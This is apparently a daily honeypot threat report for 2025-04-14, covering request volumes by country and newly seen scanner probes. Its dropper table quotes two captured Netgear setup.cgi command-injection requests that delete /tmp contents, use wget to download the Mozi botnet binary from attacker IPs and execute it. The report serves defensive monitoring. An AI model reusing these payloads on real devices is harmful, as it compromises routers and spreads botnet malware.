Skip to main content
  1. Daily-Posts/

Report: 2025-04-14

·369 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-04-14
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 2 stage 1 IP address(es), linked to 2 dropper URL(s).

There are 13 new requests that have never been observed before (these were added to the monitored request database.).

A total of 2322 requests were recorded during the day, originating from 2 different countries, with a peak of 554 requests coming from GB.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USDubai
USDubai
CNGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
59.182.104.246GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://59.182.104.246:35249/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
115.60.215.88GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://115.60.215.88:43368/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
285GET /F58rYqB/ HTTP/1.1
3111GET /OdinHttpCall1744661762 HTTP/1.1
3121GET /Odin/http/call1744661762 HTTP/1.1
3471GET /odinhttpcall1744661762 HTTP/1.1
4771GET /7vMb HTTP/1.1
4831GET /nmaplowercheck1744594891 HTTP/1.1
5241GET /nmaplowercheck1744594892 HTTP/1.1
5271GET /NmapUpperCheck1744594891 HTTP/1.1
5321GET /NmapUpperCheck1744594892 HTTP/1.1
5331GET /Nmap/folder/check1744594891 HTTP/1.1
5341GET /Nmap/folder/check1744594892 HTTP/1.1
6081GET /2018/wp-includes/wlwmanifest.xml HTTP/1.1
6551GET /media/wp-includes/wlwmanifest.xml HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0554GB
1300NL
2293SC
3279US
4233BG
5140DE
693PL
789CN
849IN
938HK
1034RU
1134CA
1225IL
1321JP
1419FR
1515UA
1612SG
1711RO
189VN
198CH
206ZA
216KR
226BE
235TR
245SE
254PT
263IT
273NO
283MC
293CZ
303AO
312TH
322ID
332AU
342FI
351BR
361TW
371AF
381AM
391GE
401BO
411AE
421VI
431BD
441PA
451AR

Related

Report: 2025-04-13
·357 words
Repport Daily
Report: 2025-04-12
·546 words
Repport Daily
Report: 2025-04-11
·3097 words
Repport Daily